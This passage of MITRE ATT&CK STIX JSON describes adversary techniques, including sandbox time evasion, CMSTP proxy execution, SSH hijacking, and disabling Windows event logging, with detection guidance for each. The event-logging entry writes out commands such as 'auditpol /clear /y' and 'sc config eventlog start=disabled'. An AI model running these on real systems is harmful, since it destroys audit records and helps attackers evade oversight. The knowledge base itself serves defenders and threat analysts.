"2017-05-31T21:30:50.958Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1062", "external_id": "T1062"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/552.html", "external_id": "CAPEC-552"}, {"source_name": "Wikipedia Hypervisor", "description": "Wikipedia. (2016, May 23). Hypervisor. Retrieved June 11, 2016.", "url": "https://en.wikipedia.org/wiki/Hypervisor"}, {"source_name": "Wikipedia Xen", "description": "Xen. (n.d.). In Wikipedia. Retrieved November 13, 2014.", "url": "http://en.wikipedia.org/wiki/Xen"}, {"source_name": "Myers 2007", "description": "Myers, M., and Youndt, S. (2007). An Introduction to Hardware-Assisted Virtual Machine (HVM) Rootkits. Retrieved November 13, 2014.", "url": "http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.90.8832&rep=rep1&type=pdf"}, {"source_name": "virtualization.info 2006", "description": "virtualization.info. (Interviewer) & Liguori, A. (Interviewee). (2006, August 11). Debunking Blue Pill myth [Interview transcript]. Retrieved November 13, 2014.", "url": "http://virtualization.info/en/news/2006/08/debunking-blue-pill-myth.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Time Based Evasion", "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\n\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)\n\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)\n\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Jorge Orchilles, SCYTHE", "Ruben Dodge, @shotgunner101", "Jeff Felling, Red Canary", "Deloitte Threat Library Team"], "x_mitre_detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host forensic analysis", "Signature-based detection", "Static File Analysis", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0", "created": "2020-03-06T21:11:11.225Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1497/003", "external_id": "T1497.003"}, {"source_name": "Deloitte Environment Awareness", "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.", "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc"}, {"source_name": "Revil Independence Day", "description": "Loman, M. et al. (2021, July 4). Independence Day: REvil uses supply chain exploit to attack hundreds of businesses. Retrieved September 30, 2021.", "url": "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/"}, {"source_name": "Netskope Nitol", "description": "Malik, A. (2016, October 14). Nitol Botnet makes a resurgence with evasive sandbox analysis technique. Retrieved September 30, 2021.", "url": "https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique"}, {"source_name": "Joe Sec Nymaim", "description": "Joe Security. (2016, April 21). Nymaim - evading Sandboxes with API hammering. Retrieved September 30, 2021.", "url": "https://www.joesecurity.org/blog/3660886847485093803"}, {"source_name": "Joe Sec Trickbot", "description": "Joe Security. (2020, July 13). TrickBot's new API-Hammering explained. Retrieved September 30, 2021.", "url": "https://www.joesecurity.org/blog/498839998833561473"}, {"source_name": "ISACA Malware Tricks", "description": "Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.", "url": "https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "AppCert DLLs", "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["Administrator", "SYSTEM"], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4bf5845d-a814-4490-bc5c-ccdee6043025", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1182", "external_id": "T1182"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}, {"source_name": "Sysinternals AppCertDlls Oct 2007", "description": "Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls. Retrieved December 18, 2017.", "url": "https://forum.sysinternals.com/appcertdlls_topic12546.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-10-13T17:57:04.993Z", "name": "Manipulation of View", "description": "Adversaries may attempt to manipulate the information reported back to operators or controllers. This manipulation may be short term or sustained. During this time the process itself could be in a much different state than what is reported. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nOperators may be fooled into doing something that is harmful to the system in a loss of view situation. With a manipulated view into the systems, operators may issue inappropriate control sequences that introduce faults or catastrophic failures into the system. Business analysis systems can also be provided with inaccurate data leading to bad management decisions.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4c2e1408-9d68-4187-8e6b-a77bc52700ec", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0832", "external_id": "T0832"}, {"source_name": "Corero", "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf"}, {"source_name": "Michael J. Assante and Robert M. Lee", "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297"}, {"source_name": "Tyson Macaulay", "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "CMSTP", "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / \u201dSquiblydoo\u201d, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Nik Seetharaman, Palantir", "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "created": "2020-01-23T18:27:30.656Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/003", "external_id": "T1218.003"}, {"source_name": "Twitter CMSTP Usage Jan 2018", "description": "Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved April 11, 2018.", "url": "https://twitter.com/ItsReallyNick/status/958789644165894146"}, {"source_name": "Microsoft Connection Manager Oct 2009", "description": "Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.", "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)"}, {"source_name": "MSitPros CMSTP Aug 2017", "description": "Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018.", "url": "https://msitpros.com/?p=3960"}, {"source_name": "GitHub Ultimate AppLocker Bypass List", "description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.", "url": "https://github.com/api0cradle/UltimateAppLockerByPassList"}, {"source_name": "Endurant CMSTP July 2018", "description": "Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018.", "url": "http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/"}, {"source_name": "Twitter CMSTP Jan 2018", "description": "Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved April 11, 2018.", "url": "https://twitter.com/NickTyrer/status/958450014111633408"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "SSH Hijacking", "description": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\n\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)\n\n[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Anastasios Pingios"], "x_mitre_detection": "Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["root"], "x_mitre_system_requirements": ["SSH service enabled, trust relationships configured, established connections"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", "created": "2020-02-25T18:34:38.290Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1563/001", "external_id": "T1563.001"}, {"source_name": "Slideshare Abusing SSH", "description": "Duarte, H., Morrison, B. (2012). (Mis)trusting and (ab)using ssh. Retrieved January 8, 2018.", "url": "https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219"}, {"source_name": "SSHjack Blackhat", "description": "Adam Boileau. (2005, August 5). Trust Transience: Post Intrusion SSH Hijacking. Retrieved December 19, 2017.", "url": "https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf"}, {"source_name": "Clockwork SSH Agent Hijacking", "description": "Beuchler, B. (2012, September 28). SSH Agent Hijacking. Retrieved December 20, 2017.", "url": "https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking"}, {"source_name": "Breach Post-mortem SSH Hijack", "description": "Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020.", "url": "https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-09-18T22:33:57.556Z", "name": "Disable Windows Event Logging", "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name EventLog).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the \u201cStart\u201d value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)\n\nThere are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the \"Start\" value in the key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System and HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application to disable the entire EventLog.(Citation: disable_win_evt_logging)\n\nAdditionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:\u201dAccount Logon\u201d /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team", "Lucas Heiligenstein"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering) \n\nIn Event Viewer, Event ID 1102 under the \u201cSecurity\u201d Windows Log and Event ID 104 under the \u201cSystem\u201d Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\n\nMonitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Log analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a", "created": "2020-02-21T20:46:36.688Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562/002", "external_id": "T1562.002"}, {"source_name": "Disable_Win_Event_Logging", "description": " dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.", "url": "https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging"}, {"source_name": "def_ev_win_event_logging", "description": "Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.", "url": "https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/"}, {"source_name": "EventLog_Core_Technologies", "description": "Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.", "url": "https://www.coretechnologies.com/blog/windows-services/eventlog/"}, {"source_name": "Audit_Policy_Microsoft", "description": "Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.", "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy"}, {"source_name": "Windows Log Events", "description": "Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.", "url": "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/"}, {"source_name": "disable_win_evt_logging", "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.", "url": "https://ptylu.github.io/content/report/report.html?report=25"}, {"source_name": "auditpol", "description": "Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.", "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"}, {"source_name": "winser19_file_overwrite_bug_twitter", "description": "Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022.", "url": "https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040"}, {"source_name": "T1562.002_redcanaryco", "description": "redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.", "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}, {"source_name": "Advanced_sec_audit_policy_settings", "description": "Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.", "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings"}, {"source_name": "auditpol.exe_STRONTIC", "description": "STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.", "url": "https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html"}, {"source_name": "evt_log_tampering", "description": "svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.", "url": "https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Scheduled Transfer", "description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\n\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", "created": "2017-05-31T21:30:34.139Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1029", "external_id": "T1029"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-07-28T17:34:51.250Z", "name": "SMB/Windows Admin Shares", "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the 